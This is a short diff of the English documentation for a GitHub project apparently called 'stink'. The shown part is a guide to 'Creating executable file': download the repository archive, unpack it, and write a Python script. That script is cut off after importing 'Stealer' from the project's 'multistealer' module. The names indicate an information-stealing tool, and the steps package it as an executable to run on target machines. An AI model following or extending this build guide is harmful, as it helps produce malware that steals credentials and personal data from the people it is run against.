FallenAstaroth/stink/docs/en.md

 ### Creating executable file

 1. [Download](https://github.com/FallenAstaroth/stink/archive/refs/heads/master.zip) archive.
-2. Create a directory and unpack the archive in it.
+2. Unpack the archive and go to the directory stink-master.
 3. Create test.py (or any other name) file in the same directory with the following code:
 ```python
 from stink.multistealer import Stealer